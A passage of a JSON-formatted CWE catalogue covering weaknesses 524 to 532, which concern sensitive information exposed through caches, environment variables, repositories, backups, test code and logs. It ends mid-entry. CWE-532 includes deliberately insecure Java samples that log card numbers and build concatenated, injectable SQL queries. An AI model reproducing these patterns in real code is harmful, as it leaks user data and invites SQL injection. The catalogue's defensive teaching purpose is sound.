NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships, Type"}]}},"524":{"attr":{"@_ID":"524","@_Name":"Use of Cache Containing Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code uses a cache that contains sensitive information, but the cache can be read by an actor outside of the intended control sphere.","Extended_Description":"Applications may use caches to improve efficiency when communicating with remote entities or performing intensive calculations.  A cache maintains a pool of objects, threads, connections, pages, financial data, passwords, or other resources to minimize the time it takes to initialize and access these resources.  If the cache is accessible to unauthorized actors, attackers can read the cache and obtain this sensitive information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Protect information stored in cache."},{"Phase":"Architecture and Design","Description":"Do not store unnecessarily sensitive information in the cache."},{"Phase":"Architecture and Design","Description":"Consider using encryption in the cache."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"204"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Caching","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Caching","attr":{"@_Date":"2020-02-24"}}]}},"525":{"attr":{"@_ID":"525","@_Name":"Use of Web Browser Cache Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application does not use an appropriate caching policy that specifies the extent to which each web page and associated form fields should be cached.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"524","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Browsers often store information in a client-side cache, which can leave behind sensitive information for other users to find and exploit, such as passwords or credit card numbers. The locations at most risk include public terminals, such as those in libraries and Internet cafes."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Protect information stored in cache."},{"Phase":["Architecture and Design","Implementation"],"Description":"Use a restrictive caching policy for forms and web pages that potentially contain sensitive information."},{"Phase":"Architecture and Design","Description":"Do not store unnecessarily sensitive information in the cache."},{"Phase":"Architecture and Design","Description":"Consider using encryption in the cache."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A2","Entry_Name":"Broken Access Control","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"37"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Browser Caching","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Browser Caching","attr":{"@_Date":"2020-02-24"}}]}},"526":{"attr":{"@_ID":"526","@_Name":"Exposure of Sensitive Information Through Environmental Variables","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Environmental variables may contain sensitive information about a remote server.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"497","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Protect information stored in environment variable from being exposed to the user."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Environmental Variables","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Environmental Variables","attr":{"@_Date":"2020-02-24"}}]}},"527":{"attr":{"@_ID":"527","@_Name":"Exposure of Version-Control Repository to an Unauthorized Control Sphere","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product stores a CVS, git, or other repository in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors.","Extended_Description":"Version control repositories such as CVS or git store version-specific metadata and other details within subdirectories. If these subdirectories are stored on a web server or added to an archive, then these could be used by an attacker. This information may include usernames, filenames, path root, IP addresses, and detailed \\"diff\\" data about how files have been changed - which could reveal source code snippets that were never intended to be made public.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Operation","Distribution","System Configuration"],"Description":"Recommendations include removing any CVS directories and repositories from the production server, disabling the use of remote CVS repositories, and ensuring that the latest CVS patches and version updates have been performed."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through CVS Repository","attr":{"@_Date":"2009-12-28"}},{"#text":"Exposure of CVS Repository to an Unauthorized Control Sphere","attr":{"@_Date":"2020-02-24"}}]}},"528":{"attr":{"@_ID":"528","@_Name":"Exposure of Core Dump File to an Unauthorized Control Sphere","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product generates a core dump file in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Protect the core dump files from unauthorized access."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM06-C","Entry_Name":"Ensure that sensitive data is not written out to disk"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"}],"Previous_Entry_Name":{"#text":"Information Leak Through Core Dump Files","attr":{"@_Date":"2009-12-28"}}}},"529":{"attr":{"@_ID":"529","@_Name":"Exposure of Access Control List Files to an Unauthorized Control Sphere","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product stores access control list files in a directory or other container that is accessible to actors outside of the intended control sphere.","Extended_Description":"Exposure of these access control list files may give the attacker information about the configuration of the site or system. This information may then be used to bypass the intended security policy or identify trusted systems from which an attack can be launched.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Protect access control list files."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Information Leak Through Access Control List Files","attr":{"@_Date":"2009-12-28"}}}},"530":{"attr":{"@_ID":"530","@_Name":"Exposure of Backup File to an Unauthorized Control Sphere","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A backup file is stored in a directory or archive that is made accessible to unauthorized actors.","Extended_Description":"Often, older backup files are renamed with an extension such as .~bk to distinguish them from production files. The source code for old files that have been renamed in this manner and left in the webroot can often be retrieved. This renaming may have been performed automatically by the web server, or manually by the administrator.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"At a minimum, an attacker who retrieves this file would have all the information contained in it, whether that be database calls, the format of parameters accepted by the application, or simply information regarding the architectural structure of your site."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Policy","Description":"Recommendations include implementing a security policy within your organization that prohibits backing up web application source code in the webroot."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"}],"Previous_Entry_Name":{"#text":"Information Leak Through Backup (.~bk) Files","attr":{"@_Date":"2009-12-28"}}}},"531":{"attr":{"@_ID":"531","@_Name":"Inclusion of Sensitive Information in Test Code","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Accessible test applications can pose a variety of security risks. Since developers or administrators rarely consider that someone besides themselves would even know about the existence of these applications, it is common for them to contain sensitive information or functions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"540","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Testing"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Distribution","Installation"],"Description":"Remove test code before deploying the application into production."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Examples of common issues with test applications include administrative functions, listings of usernames, passwords or session identifiers and information about the system, server or application configuration."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships, Time_of_Introduction"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Test Code","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Test Code","attr":{"@_Date":"2020-02-24"}}]}},"532":{"attr":{"@_ID":"532","@_Name":"Insertion of Sensitive Information into Log File","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Information written to log files can be of a sensitive nature and give valuable guidance to an attacker or expose sensitive user information.","Extended_Description":{"xhtml:p":["While logging all information may be helpful during development stages, it is important that logging levels be set appropriately before a product ships so that sensitive user data and system information are not accidentally exposed to potential attackers.","Different log files may be produced and stored for:"],"xhtml:ul":{"xhtml:li":["Server log files (e.g. server.log).  This can give information on whatever application left the file. Usually this can give full path names and system information, and sometimes usernames and passwords.","log files that are used for debugging",""]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"538","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Logging sensitive user data often provides attackers with an additional, less-protected path to acquiring the information."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"Consider seriously the sensitivity of the information written into log files. Do not write secrets into the log files."},{"Phase":"Distribution","Description":"Remove debug log files before deploying the application into production."},{"Phase":"Operation","Description":"Protect log files against unauthorized read/write."},{"Phase":"Implementation","Description":"Adjust configurations appropriately when software is transitioned from a debug state to production."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following code snippet, a user\'s full name and credit card number are written to a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"logger.info(\\"Username: \\" + usernme + \\", CCN: \\" + ccn);"}},{"attr":{"@_Demonstrative_Example_ID":"DX-120"},"Intro_Text":"This code stores location information about the current user:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();currentUser.setLocation(locationClient.getLastLocation());catch (Exception e) {}","xhtml:br":["","","","",""],"xhtml:i":"...","xhtml:div":{"#text":"AlertDialog.Builder builder = new AlertDialog.Builder(this);builder.setMessage(\\"Sorry, this application has experienced an error.\\");AlertDialog alert = builder.create();alert.show();Log.e(\\"ExampleActivity\\", \\"Caught exception: \\" + e + \\" While on User:\\" + User.toString());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}},"Body_Text":"When the application encounters an exception it will write the user object to the log. Because the user object contains location information, the user\'s location is also written to the log."},{"attr":{"@_Demonstrative_Example_ID":"DX-119"},"Intro_Text":"In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public BankAccount getUserBankAccount(String username, String accountNumber) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount userAccount = null;String query = null;try {} catch (SQLException ex) {}return userAccount;","xhtml:br":["","",""],"xhtml:div":[{"#text":"if (isAuthorizedUser(username)) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"query = \\"SELECT * FROM accounts WHERE owner = \\"+ username + \\" AND accountID = \\" + accountNumber;DatabaseManager dbManager = new DatabaseManager();Connection conn = dbManager.getConnection();Statement stmt = conn.createStatement();ResultSet queryResult = stmt.executeQuery(query);userAccount = (BankAccount)queryResult.getObject(accountNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}},{"#text":"String logMessage = \\"Unable to retrieve account information from database,\\\\nquery: \\" + query;Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-9615","Description":"verbose logging stores admin credentials in a world-readablelog file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9615"},{"Reference":"CVE-2018-1999036","Description":"SSH password for private key stored in build 